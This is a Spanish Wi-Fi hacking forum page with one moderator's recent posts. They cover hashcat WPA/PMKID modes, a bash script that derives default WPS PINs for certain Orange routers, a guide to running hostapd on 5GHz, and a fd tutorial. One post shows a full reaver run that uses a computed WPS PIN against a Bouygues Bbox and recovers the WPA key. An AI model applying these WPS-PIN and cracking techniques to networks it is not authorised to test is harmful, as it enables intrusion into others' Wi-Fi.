El libre pensamiento para un internet libre

No estas registrado.  

#1 Re: Captura del handshake y preguntas generales » ayuda para -m 16801 » Hoy 02:29:50

Es difícil entenderte pero lo más problemático es que tu luego no entiendes nada... Y luego tenemos a hilos infumables con 3 páginas de locuras como esta cosa   
El modo -m 16801 es para usar con tablas "precomputadas". Lo que se conocen también como raibow tables cuando hablamos de crack de handshake completo (modo -m 2500 y -m 2501)

  2500 | WPA-EAPOL-PBKDF2                                 | Network Protocols
   2501 | WPA-EAPOL-PMK                                    | Network Protocols
  16800 | WPA-PMKID-PBKDF2                                 | Network Protocols
  16801 | WPA-PMKID-PMK                                    | Network Protocols

No puedes usar un diccionario en texto plano, antes debes "precomputarlo", es decir crear dichas tablas
Solo te vale para 1000 eSSID concretos y el tiempo para crear una tabla es igual que para pasar el diccionario
Se hace así para eludir el cuello de botella de las funciones de tipo  PBKDF2 pero es interesante solo en muy pocos casos concretos
Por ejemplo para una red llamada default o en el caso de las (muy viejas) redes de tele2 que se llamaban todas "tele2·

#3 Re: Presentaciones » Encantado de formar farte de esta comunidad!! » Hoy 01:38:10

Con el spam-pirateo de topic casi se me olvidó saludarte... tongue
¡Bienvenido a wifi-libre xboxer4lifebiere

#4 Re: Scripts y programación » Escaneo de Redes Wifi » Ayer 14:55:26

Tu pregunta no tiene nada que ver con el tema tratado en este hilo. Te invito a leer nuestras reglas para entender como funciona un foro.

#5 Re: Scripts y programación » Escaneo de Redes Wifi » 20-02-2019 15:51:45

Si tus preguntas son relativas wifislax lo mejor a hacer es visitar su sitio para documentarte y hacer tus preguntas ahí.

#6 Re: Wireless, Internet y Redes » Generación de Pagina Falsa al Conectar en Evil Twin Attack » 20-02-2019 14:51:28

Tu tema no está situado en el foro adecuado. Las "historias de rogue AP" wink van generalmente  aquí
Además se habla del asunto del https en los portales cautivos en varios hilos del foro, es un tema recurrente (ver por ejemplo: Rogue AP + SSL gratis + 4G redireccion)
Sin hablar de los temas ya existentes entorno a fluxion y otros scripts...
Antes de abrir un tema nuevo debes usar el buscador del foro y documentarte un minimo.
Tema cerrado.

#7 Re: Alfa Network » Giga-fast router WiFi AC1200R de Alfa Network... ¡Excepcional! » 20-02-2019 14:28:15

Enhorabuena smile
Sobre los problemas que tienes para gestionar la interfaz: Son cosas de tu sistema...
La interfaz (la misma o casi que la del relatekx project con millones y millones de dispositivos funcionando en el mundo) va perfectamente en Chrome (o el navegador que sea en el sistema que sea).

ac1200r_interfaz.jpg

#8 Re: Scripts y programación » Escaneo de Redes Wifi » 20-02-2019 14:03:01

Y.... ...¿Ya está? big_smile 
Pensaba que ibas a desarrollar un poco más... ...Es que con tu pregunta tal cuál no hay mucho que decirte,
Si te interesa el scripting con bash deberías echar un ojo aquí: Introducción a bash - paso 1: Bases, echo y "Hola mundo"
...O en cualquier otro tutorial de iniciación a bash que hay miles por la red.
No hace falta ser programador para "poner colores" pero debes tener unos conocimientos mínimos sobre el funcionalmente de bash: bucles, condiciones. variables, expresiones regulares y gestión de salidas (stdout), 
  Lo más fácil para empezar sería usar timeout para definir un tiempo de escaneo, volcar el escaneo en un fichero, leer el fichero linea a linea gracias a un bucle y colorear a tu gusto
Esquema:

timeout X **orden escaneo** >> log.txt
   while read line
   do 
      **condiciones para poner colores**
      echo **linea con colores***
   done < log.txt 

Hacer scripts es más fácil que programar (para cosas simples) pero tampoco se puede improvisar. Debes empezar por las bases.
Aquí tienes un ejemplo concreto aplicando este esquema (sacado de nmk.sh):

 while read line
          do
              if [ -n "$(echo $line | grep ARV7519RW22)" ] || [ -n "$(echo $line | grep ARV7520CW22)" ] || [ -n "$(echo $line | grep VRV9510KWAC23)" ];
                then
                bssid=$(echo $line | awk -F '"' '{ print $4}')
                essid=$(echo $line | awk -F '"' '{ print $8}')
                ssid=$(echo "$essid           " | cut -c -11 )  
                channel=$(echo 0$( echo $line | awk -F '"' '{ print $11}' | awk '{ print $2}' | tr -d ',' )| rev | cut -c 1-2 | rev)
                rssi=$(echo $line | awk -F '"' '{ print $13}' | cut -c4-6)
                lck=$(echo $line | awk -F '"' '{ print $21}' | cut -c 4)
                  if [[ $lck == 2 ]];
                    then
                      abierto=$(echo -e "$green sí")
                    else
                      abierto=$(echo -e "$red no") 
                  fi 
                model=$(echo $line | awk -F '"' '{ print $30}')
                serial=$(echo $line | awk -F '"' '{ print $42}') 
                uuid=$(echo $line | awk -F '"' '{ print $46}' | cut -c 29-)
                  if [[ $uuid == 0000 ]] ;
                    then
                      wan="ffff"
                  else
                      wan=$(printf "%04x" $(( 0x$uuid - 1 )))
                  fi     
                seri=$(echo $serial | cut -c 7-)
                pin=$(python orangen.py $wan $seri)
                echo -e "$orange$bssid  $white$ssid  $orange$channel  $white$rssi  $yellow$pin $abierto  $orange$serial  $white$model$grey"
           fi
done < /tmp/scan

Se empieza con el bucle while, luego se definen variables con la salida de cada linea y puedes ver las condiciones if para hacer algunas modificación.
En penúltima linea tienes a la linea echo para escribir en consola la linea tuneada.

#9 Re: Las herramientas para WPS » Pixiewps de wiire : la herramienta para el novedoso ataque Pixie Dust. » 19-02-2019 19:59:00

@ Preston
He recibido tu correo y he pasado los datos a wiire
@ Hunter310#
Hola y bienvenido al foro
Tu pregunta es interesante pero no tiene nada que hacer en este hilo. smile
Deberías abrir un hilo nuevo para pedir ayuda/consejos/orientación en nuestro foro: scripts y programación

#10 Asesoramiento sistemas Linux » Fd: El buscador de archivo linux más rapido del mundo » 19-02-2019 19:52:13

kcdtv
Respuestas: 0
Fd: El buscador de archivo Linux más rápido del mundo

screencast.svg

Para buscar archivos en sistemas al estilo Unix (Linux y mac) tenemos a find.
Find es muy potente y lo tenemos instalado en la inmensa mayoría de las distribuciones GNU-Linux.
Fd es un buscador alternativo que no pretende reemplazar find.
Al igual que su nombre es más corto, fd no puede hacer todo lo que puede hacer find, puede quedarse corto, 
  Fd es ciertamente "menos potente" que find.
Pero tiene otra ventaja: Sus sintaxis son más cortas y el tiempo de ejecución es también más corto,
    Un orden fd se escribe y se ejecuta más rápido que una orden find

Instalación

Los resultados son lo bastante concluyentes para que fd haya sido entronizado; Forma parte de los repositorios de Debian, Arch linux. Fedora...
En algunas distribuciones el paquete se llama fd-find porque ya existía un paquete llamado fd.   
  * Si queremos instalar fd en debian debemos hacer

sudo apt install fd-find

  Y tendremos que ejecutar el programa entrando fdfind, sin el guion. Al no ser que creamos un alias para ejecutar fdfind cuando entramos fd
  * Si queremos instalar fd en Arch Linux lo haremos con

pacman -S fd

  * Fd formará oficialmente parte de los repositorios de Ubuntu dentro de poco (para la salida de la 19.04 que está a la vuelta de la esquina)
  Hasta entonces podemos usar el paquete *deb disponible desde el repositorio Github
La última versión a fecha de hoy es la 7.3.0.
Instalar el paquete en Ubuntu 18.10 (64 bits) se hace con:

sudo dpkg -i ~/Descargas/fd_7.3.0_amd64.deb
Más simple y más rápido

Más simple:
La sintaxis "base" con find, el comando que permite buscar un archivo  es:

find  -iname '*archivo*'

Mientras que con fd es

fd archivo

Más rápido:

fd_1.jpg

Con fd el resultado ha llegado mucho más rápido, Y con "colorines" big_smile
El resultado hubiera sido mejor con find utilizando argumentos (y alargando la sintaxis) para no buscar en los directorios escondidos,
Las dos advertencias por falta de privilegios son dos espinas en el pie que ralentizan mucho el proceso, 
Esto dicho de esto se trata con fd: No se trata de sustituir a find todo el tiempo pero de ir más rápido con cosas simples.
Buscar en los directorios escondidos es algo que no interesa el usuario final en 99% de los casos...
Lo que le interesa es entrar un término de búsqueda para encontrar algo perdido en su disco duro.
  Repitiendo la experiencia desde la raíź (repasando así todo el sistema de fichero) la diferencia de velocidad es menor pero sigue mejor con fd:

[email protected]:/$ time sudo find  -iname '*rulesbackup*'
./home/kcdtv/Escritorio/rulesbackup

real	0m2,705s
user	0m1,242s
sys	0m1,449s

   

time sudo fd rulesbackup 
home/kcdtv/Escritorio/rulesbackup

real	0m2,007s
user	0m3,442s
sys	0m3,606s

Lo que debemos mirar es el tiempo real:

  • - 2,007s con fd para repasar todo el sistema de archivo

  • - 2,705s con find

Esto sí: fd desgasta más recursos.
Deducimos viendo el tiempo "system" que fd sabe emplear todos los núcleos disponibles para acelerar la búsqueda.
Si el tiempo "sys" supera le tiempo "real" es que hay varios cores trabajando a la vez y repartiéndose el curro
Lo que explica en gran parte la diferencia entre fd y find es la "paralelización"
Para ser justos con "find" habría que usarlo en pipe con xarg ya que es una utilidad de consola que se dedica a "paralelizar" los procesos
  Pero la sintaxis sería aún más larga aún y mucho más compleja: xarg no se manea así sin más...

  En conclusión, fd me parece un buen complemento para nuestra consola y se agradece tenerlo a mano en nuestros repositorios. 
Tiene bastante opciones para afinar nuestras búsquedas.
  Por lo que veo, a mi personalmente me basta con las opciones que lleva: No hay nada de find que voy a echar de menos.
Así que lo recomiendo: La sintaxis es más simple que con find y es algo mas rápido. 
  Y, para rizar el riso, el resultado sale con colorines big_smile

#11 Re: Alfa Network » Giga-fast router WiFi AC1200R de Alfa Network... ¡Excepcional! » 19-02-2019 16:31:54

¿Cómo que no tienes cable? Claro que tienes: Vale cualquiera para hacer la configuración.
      Pilla el que te han dado con tu router fuente. wink
Sino con la configuración de fabrica el router viene en modo "gateway" con las dos redes WiFi abiertas.
Así que es posible configurar-lo sin cable. Pero es un mala idea porque si algo no sale como previsto hay que hacer un hard reset y volver a empezar todo desde cero.
Sobre todo que un cable de cinco metros compatibles "gigabit" (cat 5e y categorías superiores) cuesta un par de €uros. 1,95€ para ser preciso: 5m cable Ethernet Cat5e FTP

#12 Re: Preguntas generales y proyectos de redes » La travesia del AP AC homebrew » 15-02-2019 21:51:59

El Raspberry Pi 3 Model B+ lleva un chipset dual band MIMO2t2r . Está fabricado por Cypress. No conozco ni el chipset ni el fabricante. Ni idea de como se porta. No pondría mucha fe en él.,,
Ahora sí que es possible usar una alfa como la awus1900 (MIMO 4T4R en b/g/n y 3T3R en ac) con un pi para crear un PA,
Hostapd banda 5Ghz (soporte ac) con 88XXau (awuso36ach, awus1900...)
La información viene de igorpecovnik que usa una awus1900 con un orange-pi plus 2e
Este tema me hace pensar en esta freakada: Roqos Core: Router ac quadcore con sistema operativo debian
Si se ponen pigtails y se hacen agujeros en la cara para poner antenas externas puede quedar bastante chulo...

#13 Re: Herramientas wifi » Script multiuso wifi para Kali y otras distros » 15-02-2019 12:50:47

No quiero traer mala suerte pero sinceramente no le veo mucho futuro a esto.... hmm
No sé muy bien como va el tema iphone y el soporte para brechas de seguridad en modelos antiguos ... Aquí hablan de actualización de seguridad para esta vulnerabilidad en 2014 para iOS8
Android 6 es del 2015 así que tampoco será vulnerable.

#14 Re: Preguntas generales y proyectos de redes » proyecto red con ac1200r como repetidor wifi » 15-02-2019 11:59:33

Repites las mismas preguntas y ya se te ha respondido.... Para el carro ya y empieza por el inicio. big_smile
Seguimos sin saber lo principal... y con lo que tendrías que haber empezado smile:

  1. ¿Cuál es el modelo del router fuente y que tasa de transmisión máxima tiene (¿Qué tipo de ac es?)

  2. ¿Cuál es el ancho de banda contratado?

Responda por favor a estas peguntas sencillas 
Además nos despistas porque dices una cosa y luego  su contrario. tongue

Mi portatil no tiene para redes 5G, entonces he leído que podría conectarme con el router alfa a la red 5G y luego sacarla por la de 2.5G,

Mi idea sería conectarme a la red de 5Ghz y emitirla o bien por la banda de 5Ghz o 2.4Ghz

Todo esto no tiene mucho sentido... La única "información" que tenemos son "por ejemplo 20Mbps " que no sabemos de dónde salen. big_smile
¿Tienes adsl a 20Mbps?
Si es así, como ya se te ha dicho, estás efectivamente tirando el dinero por las ventanas...
No hay necesidad de usar el estándar ac: Un pequeño router b/gn con antenas externas y un chip decente te basta (menos de 30€uros)

#15 Re: Preguntas generales y proyectos de redes » proyecto red con ac1200r como repetidor wifi » 13-02-2019 20:42:28

He hecho un tema a parte con tus preguntas porque al final ninguna estaba bien ubicada,

Vale, pensaba que al ser productos diferentes y aunque compartan mismo chip, se comportarían de diferente manera.

Piensas al revés: Por qué tendría que ser diferente si es el mismo. big_smile
Además acabas de preguntarlo:

Unas últimas dudas más que tengo, la primera es ¿Tiene más potencia que la AWUSO36ACH en cuanto a la hora de recepcionar la wifi de abajo?

Y ya te había respondido... ...Si no lees las respuestas a las preguntas que haces.  tongue

se comportan de la misma forma, el router me hará también el trabajo jejeje

Si el trabajo es solo conectarte a tu red 5Ghz será lo mismo (y conetas las cosas por cable) .
Ahora si hablas de conectarte a la red 5Ghz y emitir a la vez una red 5GHz o 2.4GHz (repetidor universal) tendrás obviamente perdidas.

#16 Re: Preguntas generales y proyectos de redes » proyecto red con ac1200r como repetidor wifi » 13-02-2019 14:23:48

Para no repetirme....  big_smile
Tienes a una AWUS036ACH y me preguntas a mi.... tongue
Repito: Es el mismo chipset, un rtl8812au, el rendimiento del router es igual que con tu awus036ach
Nadie mejor que tú puede hacer pruebas. wink
Y tu petición no tienen ningún sentido en si: Lo qué pasa desde dos plantas más arriba en mi casa (que además no las hay big_smile) no tendrá nada que ver con lo que pasa en tu caso.
Las experiencias solo valen en escenarios similares que son imposibles de reproducir.
Además estamos desviando el hilo de su emfoque... Es para hablar del router, no para dudas tan especificas sobre un proyecto personal de redes. Hay un foro dedicado para esto: Preguntas generales y proyectos de redes   
Pero nadie va a poder decirte algo más útil que lo que experimentas de tu lado con tu rtl8812au.
Si quieres seguir hablando de tu proyecto debes abrir un tema en el foro que te he indicado. smile

#17 Re: Hacking wireless ético: Los métodos alternativos » ¿Luego de capturar el Handshake qué? » 13-02-2019 13:47:38

Este tema estaba mal encarrilado y no veo que vaya mejorando mucho big_smile
Empiezas mal, desde el titulo, hablando de handshake
Es completamente offtopic: El handshake no sirve de nada para un ataque rogue AP
La repuesta a "¿Luego de capturar el Handshake qué?" es "tener mucha suerte con ataques por diccionarios"
  ¿Para qué quieres un handshake?
¿Para complicarte la vida y dar aún mas la nota haciendo una DoS suplementaria que no sirve de nada? big_smile
Los scripts que usas lo hacen para comprobar la validez de la contraseña entrada,
Y es un error de concepto.
Es mucho más discreto comprobar la validez de la contraseña conectándose y es instantáneo si se examina el intercambio de paquetes EAPOL (wpa_supplicant en modo debugg basta para ello,)
  Es algo que sabrías si te focalizaría en entender el proceso en lugar de buscar el script mágico... tongue

Sigo bastante perdido ya que hay poca documentación de las versiones del software reciente. Todas las wikis son versiones viejas, sigo leyendo e intentando documentarme.

 
No sé dónde miras... Pero no es verdad: La wiki de airgeddon está currada y actualizada: "Óscar Alfonso Díaz edited this page 13 days ago ·"
Tienes también a un hilo de soporte aquí dónde v1s1t0r atienda sin discontinuar desde el lanzamiento de airgeddon en 2016, 
Personalmente diría que no se puede pedir mucho más. smile
PD: He movido tu tema en el foro adecuado ya que no hablas de handshake.

#18 Re: Preguntas generales y busqueda de nuevas brechas » WPS muere despues de que pixie me regale el PIN » 12-02-2019 16:45:17

Mi conclusión personal es que cuando nos cruzamos con un chipset ralink en un dispositivo nuevo  lo "más seguro" es hacer el ataque pixie dust empelando el PIN generado con algoritmo Computepin ( argumentos -K -p <zhao>)

#19 Wireless y redes en linux. » Hostapd banda 5Ghz (soporte ac) con 88XXau (awuso36ach, awus1900...) » 11-02-2019 18:38:25

kcdtv
Respuestas: 1
Hostapd en banda 5Ghz y con soporte ac con chispet realtek USB 88XXau (awuso36ach, awus1900 etc...)

giphy.gif

Fin de semana prolífico en los repositorios Github de Aircrack-ng: smile
Kimocoder ha publicado varias "actualizaciones" (commits) para drivers 88XXau (chipsets "ac" Realtek: rtl8821au, rtl8812au y rtl8814au)
Tenemos entre las novedades a un prometedor fichero de muestra para configuración de hostapd (creación de punto de acceso con inetrfaz wifi) en banda 5GHz (compatibilidad IEEE 802.11ac)
  Era una "asignatura pendiente" (ver we need working hostapd.conf)
No hay dificultades para crear un PA en banda 2.4GHz pero si que las hay en banda 5GHz...
El propio (y excelente) ap_create lo consigue en banda 2.4GHz pero falla en banda 5GHz.   
Es un poco para arrancarse los pelos: ¿Por quéééééé? big_smile
   Es muy frustrante no poder usar nuestra interfaz como Punto de Acceso con soporte ac... tongue
  Para poner fin a tantas frustraciones y disgustos vamos a crear juntos, paso a paso, un PA en banda 5Ghz con la awus1900 (chip rtl8814au)

Drivers

Usamos como siempre los drivers de aircrack-ng ya que son los únicos que proporcionan modo monitor con inyección.
La versión que nos interesa es la v5.2.20
   Si es la primera vez que se instalan los drivers:

  1. Instalación dependencias (sistemas basados en debian)

    sudo apt install build-essential libelf-dev linux-headers-$(uname -r) git
  2. Descargar los drivers desde github (podemos crear una carpeta y situar la consola en ella para no ser [email protected] [email protected])

     git clone -b v5.2.20 https://github.com/aircrack-ng/rtl8812au.git 
  3. Situamos la terminal en la carpeta que hemos descargado

    cd rtl8812au
  4. Compilación y instalación

    make && sudo make install

  Si ya se usan los drivers de aircrack-ng

  1. Una vez la consola abierta/situada en la carpeta rtl8812au, se comprueba que se usa en la rama correcta:

    git branch

    hostapd_5ghz_88xxau_1.jpg

    En este caso está bien, de lo contrario se tendría que cambiar de rama:

    git checkout v5.2.20
  2. Limpiar los restos de la instalación precedente

    make clean
  3. Volver a compilar y instalar

    make && sudo make install
¡Ojo!: Arrancado drivers

Es necesario añadir un argumento al arrancar el modulo (el driver)
Cada vez que enchufamos o reiniciamos nuestra interfaz debemos:

  1. Eliminar el modulo generado automáticamente

    sudo modprobe -r 88XXau
  2. Iniciar los drivers pasando el argumento requerido

    sudo modprobe 88XXau rtw_vht_enable=2

Sin esto "No hay VHT" y no aprovechamos las ventajas del estándar ac.

Punto de Acceso en banda 5GHz con soporte ac gracias a hostapd

  Voy a limitarme en este tema a explicar como arrancar nuestro chipset realtek USB en modo "Master/PA" con soporte ac.
Luego podéis hacer un "repetidor" (ver Usar un ordenador como repetidor wifi en modo puente con hostapd)
  O bien usar la interfaz para pruebas Rogue AP: Por ejemplo creando un servidor con apache que dirige el trafico hacía un portal cautivo.
Para poder usar hostapd hay que tener instalado a... hostapd

sudo apt install hostapd

  Ahora nos encargamos del fichero de configuración. Echamos primero un ojo al fichero de muestra (se encuentra en rtl8812au/documents/:

##### hostapd configuration file ##############################################

interface=wlan0
ctrl_interface=/var/run/hostapd
ssid=rtwap
channel=36
wpa=2
wpa_passphrase=87654321
#bridge=br0


##### Wi-Fi Protected Setup (WPS) #############################################

eap_server=1

# WPS state
# 0 = WPS disabled (default)
# 1 = WPS enabled, not configured
# 2 = WPS enabled, configured
wps_state=2

uuid=12345678-9abc-def0-1234-56789abcdef0

# Device Name
# User-friendly description of device; up to 32 octets encoded in UTF-8
device_name=RTL8192CU

# Manufacturer
# The manufacturer of the device (up to 64 ASCII characters)
manufacturer=Realtek

# Model Name
# Model of the device (up to 32 ASCII characters)
model_name=RTW_SOFTAP

# Model Number
# Additional device description (up to 32 ASCII characters)
model_number=WLAN_CU

# Serial Number
# Serial number of the device (up to 32 characters)
serial_number=12345

# Primary Device Type
# Used format: <categ>-<OUI>-<subcateg>
# categ = Category as an integer value
# OUI = OUI and type octet as a 4-octet hex-encoded value; 0050F204 for
#       default WPS OUI
# subcateg = OUI-specific Sub Category as an integer value
# Examples:
#   1-0050F204-1 (Computer / PC)
#   1-0050F204-2 (Computer / Server)
#   5-0050F204-1 (Storage / NAS)
#   6-0050F204-1 (Network Infrastructure / AP)
device_type=6-0050F204-1

# OS Version
# 4-octet operating system version number (hex string)
os_version=01020300

# Config Methods
# List of the supported configuration methods
config_methods=label display push_button keypad


##### default configuration #######################################

driver=rtl871xdrv
beacon_int=100
hw_mode=a
ieee80211n=1
wme_enabled=1
ht_capab=[SHORT-GI-20][SHORT-GI-40][HT40+]
wpa_key_mgmt=WPA-PSK
wpa_pairwise=CCMP
max_num_sta=8
wpa_group_rekey=86400

- El elemento más extraño es que lleva rtl871xdrv como driver (último bloque del fichero, "default configuration"
- Es de primera importancia bien asegurarse que el valor de la primera variable. interface (el fichero de muestra usa wlan0), corresponde al nombre de nuestra interfaz.
Los nombres en wlanX son "obsoletos" en la mente "original" de los desarrolladores de systemd tongue así que en muchos casos tendremos a un nombre de tipo wlxXXXXXXXXXXXX (los X siendo la mac del dispositivo)
Para ver el nombre de su interfaz wifi

sudo iw dev

En todos casos dicho fichero no está adapatdo y les invito a usar este como base:

ssid=<minombredered>
interface=<miinterfaz>
hw_mode=g
ieee80211d=1
## IEEE 802.11n
## IEEE 802.11a
hw_mode=a
## IEEE 802.11a
## IEEE 802.11ac
ieee80211ac=1
channel=<micanal>
country_code=ES
#bridge=br0
driver=nl80211
logger_syslog=0
logger_syslog_level=0
wmm_enabled=1
wpa=2
preamble=1
wpa_passphrase=<millaveWPA>
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP
rsn_pairwise=CCMP
auth_algs=1
macaddr_acl=0
## IEEE 802.11n
ieee80211n=1
ht_capab=[HT40-][SHORT-GI-40][SHORT-GI-40][DSSS_CCK-40]
vht_capab=[MAX-MPDU-11454][SHORT-GI-80][TX-STBC-2BY1][RX-STBC-1][MAX-A-MPDU-LEN-EXP3]
vht_oper_chwidth=1
vht_oper_centr_freq_seg0_idx=42
## IEEE 802.11ac
# controlling enabled
ctrl_interface=/var/run/hostapd
ctrl_interface_group=0

Copias el bloque de código que pegáis en un fichero de texto y modificáis los valores puestos entre <>:

  • ssid

  • interface

  • channel

  • wpa_passphrase

Por convención se guarda con extensión "conf" para saber a primera vista de que se trata. 
Hacemos las modificaciones pertinentes y guardamos el fichero con otro nombre, quizá en otro sitio también para no dejar ficheros no originales en el repositorio.
Tenemos:

  1. La interfaz wifi rtl88XXau

  2. La configuración hostapd

  Podemos arrancar por fin la maquinaría cool

  1. Deshabilitar Network Manager para evitar conflictos

    sudo systemctl stop NetworkManager.service
  2. Arrancar hostapd con nuestro fichero personalizado

    sudo hostapd -i <interfaz wifi> </ruta/fichero.conf>

    hostapd_5ghz_88xxau_2.jpg

Nuestra interfaz sale como PA en un canal de las frecuencias 5GHz con el ancho de banda "ac" (80MHz)

hostapd_5ghz_88xxau_4.jpg

Podréis comprobar con otra interfaz dual-band que la tasa de transmisión propuesta es la buena:

hostapd_5ghz_88xxau_3.jpg

¡Hecho!
  Arrancando los drivers con el argumento rtw_vht_enable=2 y partiendo del fichero de configuración dado anteriormente podréis disfrutar de todo el potencial de vuestro chipset a la hora de crear un punto de acceso en frecuencias 5Ghz.
  Last but not least, señalo que me he basado en el fichero de configuración de igorpecovnik quien está haciendo contribuciones muy interesantes en el repositorio de aircrack-ng: Problem with EDUP (rtl8814au) and hostapd #272

#20 Re: Asesoramiento sistemas Linux » Debian arm » 08-02-2019 17:32:08

¡Buenas tardes blyllo y bienvenido al foro! smile
El sitio (para colocar tu tema) está bien... Lo que pasa es que, cómo puedes constatar, no tenemos a temas tratando de los espinosos problemas con "liberación" de tablets y/o smartphones. 
  Entiendo que lo que has leído hasta ahora es sobre instalar debian "en" android.
Pero lo que quieres hacer es hacer algo como un dual boot o eventualmente quitar android del todo para poner debian. 
Personalmente no tengo ni idea... tongue  Con las tablets/smartphone y android estoy súper perdido. Siento no poder ayudarte...

#21 Re: Preguntas generales y busqueda de nuevas brechas » WPS muere despues de que pixie me regale el PIN » 08-02-2019 16:51:46

Me he topado con un caso similar... Uno en siete años.
Se trata de la B-Box "Sensation" (lol con los nombres) hecha por SAGEMCOM, un router de la gama "[email protected]" .

bbox_pin_hack_2.jpg

Este dispositivo es vulnerable al ataque pixiewps y al algoritmo ComputePIN (mac a decimal)  pero se tiene un solo intento,
La primera vez que he probado he hecho el ataque pxiedust, he obtenido el PIN pero (sin que el router diga bloquearse) el PA no respondía más y no he obtenido la llave (ni otro m3).
He reiniciado el PA.
La segunda vez, en lugar de hacer pxiedust, he generado el PIN con el algoritmo Computepin, lo he mandado con -p y he obtenido la llave:

sudo reaver -p 80290087 -b 00:78:9E:  -c 1 -vv -n -i wlan1mon

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212 & Wiire

[+] Switching wlan1mon to channel 1
[+] Waiting for beacon from 00:78:9E:
[+] Associated with 00:78:9E: (ESSID: Bbox-)
[+] Starting Cracking Session. Pin count: 10000, Max pin attempts: 11000
[+] Trying pin 80290087.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 44:ae:aa:49:f1:8a:91:61:6c:87:c0:e5:fc:f0:d2:bf
[P] PKE: 47:08:30:ff:fc:33:da:da:93:c3:0c:26:c0:3b:02:29:2f:7a:83:97:eb:f7:1c:36:3c:77:8e:80:e2:33:55:9d:a1:a3:e2:0e:7d:a8:98:0d:4b:d6:5a:ac:5d:a8:e1:e8:8a:12:40:c9:39:29:9f:fc:4e:6e:85:76:58:ac:02:f1:e4:3e:aa:a0:bb:91:eb:60:08:3f:1d:f7:d4:83:10:95:7a:80:52:09:3d:63:ab:36:63:b2:8a:38:aa:1d:77:66:6b:51:af:b8:26:94:f5:cb:0e:d9:a0:ac:4c:9a:04:a1:71:5e:ea:4b:c7:52:08:6d:42:1b:4d:7f:44:03:c7:be:c5:c9:77:26:9a:6b:6f:2e:18:ec:af:a6:37:fb:d1:a5:ff:bc:ea:96:28:17:e4:2c:f4:dc:27:7d:db:c2:a7:23:57:c0:29:13:1b:65:76:90:69:aa:d7:ed:08:70:c8:f8:a0:5c:ac:bf:3e:e1:7f:5d:30:3e:9d:1f:cd:66:26:32
[P] WPS Manufacturer: Celeno Communication, Inc.
[P] WPS Model Name: Celeno Wireless AP 2.4G
[P] WPS Model Number: CL1800
[P] Access Point Serial Number: 12345678
[+] Received M1 message
[P] R-Nonce: c3:8e:c6:84:52:01:86:f5:66:98:ea:5d:72:8d:32:8f
[P] PKR: d4:e0:04:27:0f:0e:25:f4:e3:7c:2e:79:d3:8d:0d:95:f2:9b:34:7b:f2:6f:92:54:6a:7e:a1:0e:e3:24:76:43:70:e0:a8:20:4b:4c:39:b1:bf:f9:2b:77:77:03:81:17:1c:d5:0a:19:a2:6e:65:43:ff:f2:7f:d3:9e:0f:a3:78:8e:b4:10:e0:b7:22:53:8d:c3:26:ef:86:5c:a5:ee:c1:20:ef:d0:59:93:54:4d:20:fc:23:86:2d:65:37:fa:75:52:10:0e:22:6a:fe:af:ea:cb:f7:47:86:eb:e8:fb:6d:ec:66:3a:ab:54:71:be:40:28:85:62:5a:08:89:4d:55:6c:1f:20:9a:ea:28:c1:86:71:7c:b5:56:28:4a:b0:f1:dd:1c:c3:06:22:14:f8:5c:a6:32:c2:06:de:4f:0d:b9:9e:6d:1d:d3:63:36:d6:50:8b:3f:ec:19:c0:16:ce:e2:31:a1:ac:4e:08:e5:1d:7a:8d:65:eb:29:de:3b:39:8a
[P] AuthKey: 8b:3d:4a:7e:86:1e:8f:be:52:a4:75:0a:ec:f7:67:6f:7c:0c:3b:af:77:df:5f:6e:98:54:fa:d6:cc:b7:b3:94
[+] Sending M2 message
[P] E-Hash1: 6a:7c:48:47:b4:cd:40:00:38:8d:3b:d7:2b:15:3e:4c:6a:6c:cd:0e:c6:95:33:be:9b:e8:87:47:aa:3a:5e:69
[P] E-Hash2: aa:5c:c8:ae:82:24:ab:a3:60:e3:0f:ab:64:bd:c1:fc:f9:e3:fb:70:20:76:28:e1:fe:33:ed:31:19:1e:18:95
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 3 seconds
[+] WPS PIN: '80290087'
[+] WPA PSK: '53CFD733A237625EE57D5C4D2A2537'
[+] AP SSID: 'Bbox-'
[+] Nothing done, nothing to save.

Después he probado un ataque pixiedust pero está vez con el pin correcto ya generado.
Así ha funcionado (se ha hecho el pixewps y he podido otener la llave): 

  • El router acepta el PIN valido las veces que queramos y devolverá la llave las veces que queramos .

  • Pero si mandamos un PIN erróneo se "jode" el modo PIN y no se puede hacer nada

Digo "jodía" por no poder decir otra cosa...
...Los modos anunciados en los probes seguían siendo los mismos (ponía todo: label, pbc, kpd etc...)  y el valor del campo "WPS locked" tampoco cambiaba (sin bloqueo)
   Otro ejemplo de error por parte del ISP en la configuración del protocolo con su interfaz de gestión ultra capada. .
Porque desde la interfaz Bouygues no hay nada acerca del modo PIN, solo se habla de PBC y hay solo un  botón virtual. 

bbox_pin_hack.jpg

   
  Bouygues había tenido problemas en sus modelos anteriores para deshabilitar correctamente el WPS en modo PIN: Bbox : un ejemplo surrealista de brecha WPS


Al igual que con los routers afectados por la brecha PIN "NULL"; la interfaz no permite hacer nada con el modo PIN. Se supone que ni existe...
Pero tenemos en realidad un intento para mandar el PIN correcto.
Como dice Patcher no es lógico y no debería ocurrir pero me ha pasado también, en un caso (sobre miles).
Quizá este dispositivo ARRIS tenga un fallo similar en su configuración.

#23 Re: Scripts y programación » PBC-bucle » 06-02-2019 17:30:18

El pueblo ha hablado: Este tema merece una chincheta. big_smile ¡Hecho!

#24 Re: Alfa Network » awus036ach windows: Asuntos compatibilidad drivers/utilidad realtek » 06-02-2019 16:14:40

Estoy ya muy familiarizado con windows jajaja

Como [email protected] Desde la escuela hasta el trabajo pasando por el PC de casa....  Pero esto no te impide probar cosas nuevas smile .... Sobre todo que windows 7 empieza a ser francamente desfasado y le queda menos de un año de vida. Hace poco he tenido que lidiar con una empresa que tiene windows7... ¡Vaya risa! Para arrancar un SO de lo mas básico, (un par de GUI propias, dos navegadores y basta) se necesitaba con un i3 veinte veces más tiempo que para arrancar xubuntu en mi duocore cutre petado de softwares hasta reventar... ¡Qué alguien quite el freno a mano! lol   
Lo que vamos a hacer es crear un hilo con su propio titulo para no desviar este.
Es un problema muy especifico que no tiene vocación a estar tratado en un hilo generalista.
